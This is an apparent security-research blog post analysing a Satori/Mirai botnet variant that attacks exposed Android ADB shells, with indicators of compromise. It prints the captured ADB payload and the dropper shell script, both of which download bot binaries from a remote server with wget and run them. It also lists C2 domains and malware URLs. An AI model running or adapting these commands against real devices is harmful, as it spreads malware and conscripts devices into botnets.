<!DOCTYPE html>
<html>

<head>
	<!-- Meta -->
	<meta charset="UTF-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
	<meta name="generator" content="Jekyll">

	<title>Satori/Mirai botnet detected</title>
  <meta name="description" content="Variant of Satori/Mirai detected attacking public available ADB shells">

	<!-- CSS & fonts -->
	<link rel="stylesheet" href="/css/main.css">

	<!-- RSS -->
	<link href="/atom.xml" type="application/atom+xml" rel="alternate" title="ATOM Feed" />

  <!-- Favicon -->
  <link rel="shortcut icon" type="image/png" href="img/favicon.png">

  <meta http-equiv="refresh" content="0; URL=https://telekom-security.github.io/2018/07/adb-botnet.html">

</head>


<body>
	<div id="wrap">
	  	
	  	<!-- Navigation -->
      
    
    <!-- Icon menu -->
	  <a id="nav-menu">
	  	<div id="menu"></div>
	  </a>

      <!-- Header -->
      
        <header id="header" class="parent justify-spaceBetween">
  <div class="inner w100 relative">
    <span class="f-left">  
      <a href="/">
        <h1>
          <span>Telekom</span> Security
        </h1>
      </a>
    </span>
    <span id="nav-links" class="absolute right bottom">
      <!-- Nav pages -->
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
	      
	    
      
      <!-- Nav links -->
	    <a href="/index.html">Home</a>
<a href="/imprint.html">Imprint</a>
<a href="/disclaimer.html">Disclaimer</a>
<a href="/privacy-policy.html">Privacy Policy</a>
<a href="https://security.telekom.com/">About Telekom Security</a>


    </span>
  </div>
</header>




      

    <!-- Main content -->
	  <div id="container">
		  
		<main>

			<article id="post-page">
	<h2>Variant of Satori/Mirai detected attacking public available ADB shells</h2>		
	<time datetime="2018-07-10T00:00:00+02:00" class="by-line">10 Jul 2018</time>
	<div class="content">

		<p>On the 10th of July at 23:30 UTC we noticed an increased traffic on our <a href="http://sicherheitstacho.eu/start/main">blackhole monitoring</a> on TCP port 5555. Upon further analysis, we saw a big chunk of this traffic coming from China, USA and the Dominican Republic. In total we gathered <strong>246.434 packets</strong> from <strong>68.361 unique IPs</strong>. Based on the packet details we gathered, we can assume that the packets were generated by a lot of different devices. In addition, the traffic behavior on port 5555 matches the typicall scan behavior of botnets.</p>

<!--more-->

<p><img src="http://telekomsecurity.github.io//assets/images/adb-botnet-g1.png" alt="" /></p>

<h3 id="inspecting-the-payload-and-stumbling-on-old-friends">Inspecting the payload and stumbling on old friends</h3>

<p>The payload registered and captured by out T-Pot honeypots (35.204) looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CNXN 2 host::OPEN ]+shell:&gt;/sdcard/Download/f &amp;&amp; cd /sdcard/Download/;
&gt;/dev/f &amp;&amp; cd /dev/; busybox wget http://95.215.62.169/adbs -O -&gt; adbs; sh adbs; rm adbs
</code></pre></div></div>

<p>The first chars of this payload are Android Debug Bridge (ADB) commands, used for initiating a connection to a debug channel. This connection is then used to execute a shell command.</p>

<p>Let’s examine the command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt;/sdcard/Download/f &amp;&amp; cd /sdcard/Download/;
</code></pre></div></div>

<p>Short shell builtin for clearing (or touching) the file <code class="language-plaintext highlighter-rouge">&gt;/sdcard/Download/f</code> and changing to this folder.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt;/dev/f &amp;&amp; cd /dev/;
</code></pre></div></div>

<p>Same as above, just with a different file (and folder).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>busybox wget http://95.215.62.169/adbs -O -&gt; adbs; sh adbs; rm adbs
</code></pre></div></div>

<p>Download <code class="language-plaintext highlighter-rouge">adbs</code> from dropper server, execute it and remove it. The <code class="language-plaintext highlighter-rouge">rm</code> is used to cover up tracks and only keep the bot/malware in memory.</p>

<p>Searching for this IP reveals it was already <a href="http://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/">detected some time ago</a> in correlation to the Satori botnet.</p>

<h3 id="analyzing-the-dropped-file">Analyzing the dropped file</h3>

<p>The downloaded <code class="language-plaintext highlighter-rouge">adbs</code> shellscript looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh

n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
http_server="95.215.62.169"

for a in $n
do
    cp /system/bin/sh $a
    &gt;$a
    busybox wget http://$http_server/adb/$a -O -&gt; $a
    chmod 777 $a
    ./$a
done

for a in $n
do
    rm $a
done
</code></pre></div></div>

<p>This is a simple script to download the malware compiled for different architectures and execute them (all one by one). Dirty approach – but works.</p>

<h3 id="another-variant-of-satori">Another variant of Satori?</h3>

<p>Having a deeper look at the downloaded binaries, this looks like another modified version of Mirai or Satori, adjusted to exploit public available ADB devices. Heading over to VirusTotal, only five engines detect this binary (ELF;Mira-RQ) until now. First date of detection: 2018-07-09 09:20.</p>

<p><img src="http://telekomsecurity.github.io//assets/images/adb-botnet-vt.png" alt="" /></p>

<p>We can find the same <code class="language-plaintext highlighter-rouge">table_unlock</code> function mentioned in the <a href="http://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/">previous linked blog article</a>, indicating a variant or at least code shared between the two. Compare this screenshot from the blog post:</p>

<p><img src="http://telekomsecurity.github.io//assets/images/adb-botnet-tableUnlock2-360.png" alt="" /></p>

<p>With what we can find in the new binary:</p>

<p><img src="http://telekomsecurity.github.io//assets/images/adb-botnet-tableUnlock2.png" alt="" /></p>

<p>As usualy seen in a Mirai bot, strings are “encrypted” with a simple XOR. Decrypting with <code class="language-plaintext highlighter-rouge">0x31</code> leads to the following results:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>LOLNOGTFO – kills bot [1]
KILLATTK - kills any ongoing attacks [1]
GETSPOOFS - ???
GAYFGT – sth. reporting related? [1]
</code></pre></div></div>

<p>And the following domains:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>i.rippr.cc -&gt; 95.215.62.169 (TXT record)
p.rippr.cc -&gt; 180.101.204.161 (TXT record)
</code></pre></div></div>

<p>[1] Similar commands found <a href="http://dosattack.net/2015/09/13/Is-your-router-part-of-a-botnet.html">here</a> on a  blog.</p>

<h2 id="files">Files</h2>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. http://95.215.62.169/i686.bot.le - 1eddee13762d7996c02b4c57fa3f8ffc
2. http://95.215.62.169/arm.bot.le - d01f194c374eebb9235291e34bc0d185
3. http://95.215.62.169/arm7.bot.le - d10c1591aee800a5f37f654f1ecd20a8
4. http://95.215.62.169/x86_64.bot.le - 4e4fc7e7599e5bd07e097a2f313486fe
5. http://95.215.62.169/mips.bot.be - a18b0d1401305588107e58054e6aa2ab
6. http://95.215.62.169/mipsel.bot.le - 9689cc9fe613b735fa1d386dffcdd6d8
7. http://95.215.62.169/i586.bot.le - 61f0bad58d28e73d1ef29b9574d28e41
</code></pre></div></div>

<h2 id="references">References</h2>

<ul>
  <li><a href="http://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/">http://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/</a></li>
  <li><a href="http://dosattack.net/2015/09/13/Is-your-router-part-of-a-botnet.html">http://dosattack.net/2015/09/13/Is-your-router-part-of-a-botnet.html</a></li>
</ul>


		
	</div>
</article>



	  </main>
		
		  <!-- Pagination links -->
      

	  </div>
	    
	    <!-- Footer -->
	    <footer><span>Based on Monochrome Jekyll theme</span></footer>


	    <!-- Script -->
      <script src="/js/main.js"></script>	


	</div>
</body>
</html>
